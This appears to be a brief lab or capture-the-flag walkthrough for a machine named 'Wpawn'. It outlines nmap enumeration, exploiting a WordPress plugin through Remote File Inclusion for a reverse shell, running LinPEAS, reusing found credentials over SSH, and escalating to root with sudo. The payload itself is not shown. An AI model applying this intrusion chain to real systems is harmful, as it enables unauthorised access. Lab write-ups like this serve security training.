🐧Wpawn

192.168.84.123

Enumeration

sudo nmap 192.168.84.123 -sV -A -p-

Port 22

Banner grab

Port 80

Running dirbuster to enumerate the website.

Found an interesting plugin being used.

There are known vulnerabilities for this plugin. https://wpscan.com/vulnerability/7b412469-cc03-4899-b397-38580ced5618arrow-up-right\

Was able to get a reverse shell using the following.

Creating text file payload.txt and pulling it with Remote File Inclusion.

Shell

Got a shell.

Found no interesting files. There is another user named takis. Dropped Linpeas in /tmp

Found credentials.

The found password works for takis' account, connected via ssh.

Running sudo -l

Root

Ran sudo su

Last updated